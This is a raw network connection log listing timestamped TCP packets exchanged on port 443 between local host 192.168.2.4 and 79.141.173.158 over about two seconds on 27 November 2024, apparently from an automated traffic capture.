Nov 27, 2024 16:29:46.776036978 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.779911041 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.779959917 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.782953978 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.783025026 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.786186934 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.786258936 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.789066076 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.789160967 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.792781115 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.792860031 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.796578884 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.796674967 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.799650908 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.799716949 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.812645912 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.812726974 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.816123009 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.816189051 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.819216013 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.819286108 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.959984064 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.960098028 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.963181973 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.963255882 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.966351032 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.966415882 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.969729900 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.969815969 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.973660946 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.973727942 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.976418018 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.976506948 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.979579926 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.979650974 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.982574940 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.982646942 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.986471891 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.986563921 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.989536047 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.989614964 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.993077040 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.993149042 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.996222019 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.996289015 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.999236107 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.999316931 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.013699055 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.013780117 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.016112089 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.016175032 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.019408941 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.019474030 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.022413015 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.022480965 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.162682056 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.162796974 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.166574955 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.166652918 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.169776917 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.169882059 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.173047066 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.173142910 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.177320957 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.177405119 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.179979086 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.180052042 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.183129072 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.183209896 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.185997963 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.186073065 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.190000057 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.190066099 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.192616940 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.192689896 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.196453094 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.196546078 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.199656010 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.199736118 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.202737093 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.202824116 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.216154099 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.216259003 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.219842911 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.219926119 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.222829103 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.222910881 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.363637924 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.363755941 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.366137981 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.366239071 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.370127916 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.370263100 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.373529911 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.373635054 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.376307011 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.376420975 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.380276918 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.380347967 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.383289099 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.383399010 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.386373043 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.386482954 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.389379978 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.389482021 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.393381119 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.393466949 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.395972967 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.396058083 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.399981976 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.400059938 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.403023958 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.403103113 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.417135954 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.417227983 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.419831038 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.419948101 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.422740936 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.422820091 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.563731909 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.563822031 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.566973925 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.567079067 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.570043087 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.570156097 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.573889017 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.573967934 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.576967001 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.577045918 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.580463886 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.580538988 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.583067894 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.583174944 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.586970091 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.587058067 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.590121031 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.590197086 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.593602896 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.593704939 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.596687078 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.596848965 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.599786997 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.599884987 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.603727102 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.603785992 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.617170095 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.617249012 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.619764090 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.619843960 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.623090029 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.623162031 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.626317024 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.626408100 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.767477989 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.767582893 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.770441055 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.770519018 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.773796082 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.773896933 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.776762009 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.776875019 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.780493021 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.780579090 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.783627033 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.783740044 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.786732912 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.786835909 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.790663004 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.790754080 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.793885946 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.793986082 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.797257900 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.797394991 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.800257921 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.800343037 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.803556919 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.803632021 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.806468010 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.806541920 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.819945097 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.820056915 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.823344946 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.823421001 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.826349974 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.826448917 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.970213890 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.970295906 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.970599890 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.970699072 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.973740101 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.973835945 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.976890087 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.976985931 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.980736971 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.980813980 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.983797073 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.983901978 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.986955881 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.987046957 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.990068913 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.990148067 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.994808912 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.994868994 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:47.997066975 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:47.997143030 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.000523090 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.000608921 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.006732941 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.006829977 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.009459019 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.009603977 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.022677898 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.022764921 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.026165962 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.026257992 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.029118061 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.029202938 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.167814970 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.167918921 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.171072960 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.171186924 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.174164057 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.174269915 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.177243948 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.177376032 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.180171013 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.180247068 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.184215069 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.184303045 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.187278032 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.187357903 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.190443993 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.190529108 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.194484949 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.194684982 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.197349072 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.197444916 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.200922012 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.201020002 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.203953981 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.204041958 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.207268953 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.207350969 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.210129023 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.210216999 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.223217010 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.223345995 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.226326942 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.226454020 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.230190992 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.230317116 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.371798038 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.371951103 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.374653101 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.374747992 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.377882957 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.377985954 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.380826950 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.380948067 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.384748936 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.384840012 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.387852907 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.387938976 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.390985012 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.391088009 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.394017935 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.394097090 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.397922039 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.398029089 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.401103973 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.401207924 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.404582024 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.404655933 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.407736063 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.407864094 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.410703897 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.410809994 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.423079967 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.423194885 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.426824093 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.426933050 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.430042982 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.430118084 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.583904982 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.583983898 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.820115089 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.820132971 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.820183992 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.820291996 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.820308924 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.820334911 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.820354939 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.820472002 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.820522070 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.821216106 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.821285009 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.821362019 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.821415901 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.822212934 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.822278023 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.823142052 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.823200941 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.823678970 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.823717117 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.823744059 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.823753119 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.823772907 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.823791981 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.824572086 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.824640989 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.825581074 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.825624943 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.825647116 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.825654984 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.825675011 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.825700045 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.826482058 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.826550961 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.827397108 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.827459097 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.827467918 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.827522993 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.830024958 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.830074072 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.830099106 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.830106974 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.830131054 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.830153942 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.830984116 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.831166029 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.832916975 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.832993984 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.836013079 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.836081982 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.839960098 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.840049982 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.843040943 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.843122005 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:48.846122980 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:48.846209049 CET	49731	443	192.168.2.4	79.141.173.158
